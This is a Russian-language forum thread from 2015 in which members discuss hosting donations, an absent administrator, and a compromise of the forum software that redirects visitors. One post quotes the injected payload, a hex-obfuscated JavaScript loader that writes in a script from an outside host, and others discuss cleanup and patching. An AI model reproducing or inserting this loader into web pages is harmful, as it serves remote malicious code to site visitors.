Поделиться Опубликовано 8 октября, 2015 Не мы такие, жизнь такая. Наша велотуса ----->> "ВелоРелакс Волгоград": vk.com/velorelaxvlg Специалист по недвижимости: покупка/продажа, юридическое сопровождение сделок, консультации Ссылка на комментарий Поделиться на другие сайты Поделиться
Поделиться Опубликовано 8 октября, 2015 неплохая идея, завести форум на арм машинке и скидываться тому, у кого она будет работать 7*24, проблемы с хостингом не будет.народу на форуме полно, но активных юзеров не так чтобы и много и они рублей по 200 могли бы скидываться Ссылка на комментарий Поделиться на другие сайты Поделиться
Поделиться Опубликовано 9 октября, 2015 А кто-нибудь пробовал (имею ввиду, прежде всего, администрацию форума)? Ссылка на комментарий Поделиться на другие сайты Поделиться
Поделиться Опубликовано 9 октября, 2015 иди в у.т.б. Наша велотуса ----->> "ВелоРелакс Волгоград": vk.com/velorelaxvlg Специалист по недвижимости: покупка/продажа, юридическое сопровождение сделок, консультации Ссылка на комментарий Поделиться на другие сайты Поделиться
Поделиться Опубликовано 9 октября, 2015 (изменено) отвыкай хамить ты кто, админ? я обращался к админу с просьбой разъяснения причин и способов решения. а ты влезаешь, не неся ничего конструктивного, и только сетуешь, сетуешь, сетуешь... вот я и посоветовал тебе пойти в свою тему. Изменено 9 октября, 2015 пользователем Olegator Наша велотуса ----->> "ВелоРелакс Волгоград": vk.com/velorelaxvlg Специалист по недвижимости: покупка/продажа, юридическое сопровождение сделок, консультации Ссылка на комментарий Поделиться на другие сайты Поделиться
Поделиться Опубликовано 9 октября, 2015 Olegator, очевидно что решение проблемы не в деньгах. Navigāre necesse est, vivere non est necesse. Ссылка на комментарий Поделиться на другие сайты Поделиться
Поделиться Опубликовано 9 октября, 2015 видишь ли, , как бы тебе объяснить? 1. Я не могу сделать что то конкретное для форума, кроме как поддержать в случае необходимости материально, ибо не силен в этом. а если не силен то и не берусь. этим должны заниматься знающие люди.2. Я считаю что если ты взялся за что то то и делай не требуя ничего взамен. те кто захочет помогут. если инкогнито админит этот форум значит оно ему надо. если надо он может попросить и ему никто не откажет. надо я сам заплачу за тех у кого 50 рублей в год не найдется.3. неприязни к тебе у меня нет. есть лишь несогласие с твоими высказываниями и позициями по некторым вопросам. Наша велотуса ----->> "ВелоРелакс Волгоград": vk.com/velorelaxvlg Специалист по недвижимости: покупка/продажа, юридическое сопровождение сделок, консультации Ссылка на комментарий Поделиться на другие сайты Поделиться
Поделиться Опубликовано 9 октября, 2015 , мне не совсем понятно (либо нам чего-то недоговаривают). Т.е. предлагается какому-то человеку с форума объявить сбор, указать свои реквизиты, собрать деньги, найти админа (или модератора) и попросить его взять собранные средства? Зачем плодить эти передаточные звенья? Если есть реальная потребность в содержании и развитии форума, то куда проще администрации форума указать свои реквизиты для перечисления взносов (пожертвований, платежей, оброка, кому как нравится). Это давно устоявшаяся практика. Ничего предрассудительного в этом нет.Я, например, высоко ценю тот труд, который делает администрация форума и готов перевести энную сумму на развитие форума.Реквизиты какие? Olegator, TriRuki и XOkey 3 Ссылка на комментарий Поделиться на другие сайты Поделиться
Поделиться Опубликовано 9 октября, 2015 , было прямо предложено примерно так давайте раз вгод будем делать взнос за хостинг, домен итд, лишь бы работало все.И даже нашлись готовые сделать взнос Сбросьте номер карты, закину взнос.В ответ - тишина. They say that we're flying too high - Well get used to looking upvolgomedprot.ru Ссылка на комментарий Поделиться на другие сайты Поделиться
Поделиться Опубликовано 9 октября, 2015 скоро эта тема превратится в филиал утб Наша велотуса ----->> "ВелоРелакс Волгоград": vk.com/velorelaxvlg Специалист по недвижимости: покупка/продажа, юридическое сопровождение сделок, консультации Ссылка на комментарий Поделиться на другие сайты Поделиться
Поделиться Опубликовано 9 октября, 2015 Если есть реальная потребность в содержании и развитии форума, то куда проще администрации форума указать свои реквизиты для перечисления взносовКороче склифасовский... Не давеча как месяц назад я лично в оффлайне беседовал с админом. Высказл мысль о том что в случае необходимости материальные средства можно собрать. Получил стойкие уверения что дело не в деньгах. Navigāre necesse est, vivere non est necesse. Ссылка на комментарий Поделиться на другие сайты Поделиться
Поделиться Опубликовано 9 октября, 2015 (изменено) а может дело в деньгах, раз перенаправление на сайты идет? Изменено 9 октября, 2015 пользователем Olegator Наша велотуса ----->> "ВелоРелакс Волгоград": vk.com/velorelaxvlg Специалист по недвижимости: покупка/продажа, юридическое сопровождение сделок, консультации Ссылка на комментарий Поделиться на другие сайты Поделиться
Поделиться Опубликовано 9 октября, 2015 , при всем к вам глубочайшем уважении, но не нужно обобщать и передергивать. значит у него есть на то причиныможет просто выйти на 3 сек. на форум и написать, что-то типа: "Администратор временно недоступен". И никаких вопросов. Большей части из написанного не было бы. Olegator, 027 и TriRuki 3 Ссылка на комментарий Поделиться на другие сайты Поделиться
Поделиться Опубликовано 9 октября, 2015 а вдруг он покинул форум и уже в форосе? Наша велотуса ----->> "ВелоРелакс Волгоград": vk.com/velorelaxvlg Специалист по недвижимости: покупка/продажа, юридическое сопровождение сделок, консультации Ссылка на комментарий Поделиться на другие сайты Поделиться
Поделиться Опубликовано 9 октября, 2015 , хорошо-хорошо. Если говорить за себя (а то мне кажется, что вы как бы и мне отвечаете и не мне ), то:1. Ничего не требовал и не возмущался.2. Наоборот, хотел помочь.3. Все понимаю и принимаю. p.s Предлагаю для вашей с @Olegator словесной пикировки создать отдельную "приватную" тему. p.p.s Если я правильно понимаю (догадываюсь), то нашего Админа можно поздравлять? Ссылка на комментарий Поделиться на другие сайты Поделиться
Поделиться Опубликовано 9 октября, 2015 (изменено) p.p.s Если я правильно понимаю (догадываюсь), то нашего Админа можно поздравлять?Присоединяюсь, за ранее. Однако, имхо рождение ребенка не нагружает так, что даже 3-х минут нет свободных. Изменено 9 октября, 2015 пользователем TriRuki They say that we're flying too high - Well get used to looking upvolgomedprot.ru Ссылка на комментарий Поделиться на другие сайты Поделиться
Поделиться Опубликовано 9 октября, 2015 Короче склифасовский... Не давеча как месяц назад я лично в оффлайне беседовал с админом. Высказл мысль о том что в случае необходимости материальные средства можно собрать. Получил стойкие уверения что дело не в деньгах.Совершенно верно. Дело в чемодане без ручки. Никогда ничего не трогай на моей лодке! Ссылка на комментарий Поделиться на другие сайты Поделиться
Поделиться Опубликовано 9 октября, 2015 Константин, если эксплоят через кэш, может, его тупо отключить?Или можно написать простеньккий скрипт, который будет грепать по крону содержимое кэша и убивать зловредное файло.В качестве временного костыля. Никогда ничего не трогай на моей лодке! Ссылка на комментарий Поделиться на другие сайты Поделиться
Поделиться Опубликовано 9 октября, 2015 Или можно написать простеньккий скрипт, который будет грепать по крону содержимое кэша и убивать зловредное файло. Оно совершенствуется: <script> var _0x5fd8=["\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x73\x68\x6F\x63\x6B\x77\x61\x76\x65\x70\x75\x62\x2E\x72\x75\x2F\x38\x30\x32\x67\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0x5fd8[1]](_0x5fd8[0]); </script> Гугл говорит известный эксплоит и советы по лечению тоже есть. Ссылка на комментарий Поделиться на другие сайты Поделиться
Поделиться Опубликовано 9 октября, 2015 Ну так рецепты в студию, чего томить.Или неясно, что у админа хлопот полон рот? (как ему кажется по неопытности) Никогда ничего не трогай на моей лодке! Ссылка на комментарий Поделиться на другие сайты Поделиться
Поделиться Опубликовано 9 октября, 2015 Ну так рецепты в студию, чего томить.https://revisium.com/ru/blog/virus_in_ipb_vbulletin.html первое что нашел гугл. Или неясно, что у админа хлопот полон рот? (как ему кажется по неопытности)так надо 027 дать доступ к базе и серверу да и все. Суперенот_2013 1 Ссылка на комментарий Поделиться на другие сайты Поделиться
Поделиться Опубликовано 9 октября, 2015 не в этой жизни Суперенот_2013 1 Никогда ничего не трогай на моей лодке! Ссылка на комментарий Поделиться на другие сайты Поделиться
Поделиться Опубликовано 10 октября, 2015 Ну вроде залатал дырку, пробуйте. не в этой жизниА енотегу, вон, понравилась идея)) Ссылка на комментарий Поделиться на другие сайты Поделиться
Поделиться Опубликовано 10 октября, 2015 Какая идея? Что я не хочу админить ВВ? Никогда ничего не трогай на моей лодке! Ссылка на комментарий Поделиться на другие сайты Поделиться
Поделиться Опубликовано 10 октября, 2015 С мегафона по прежнему на моб-ку Ссылка на комментарий Поделиться на другие сайты Поделиться
Рекомендуемые сообщения
Для публикации сообщений создайте учётную запись или авторизуйтесь
Вы должны быть пользователем, чтобы оставить комментарий
Создать аккаунт
Зарегистрируйте новый аккаунт в нашем сообществе. Это очень просто!
Регистрация нового пользователяВойти
Уже есть аккаунт? Войти в систему.
Войти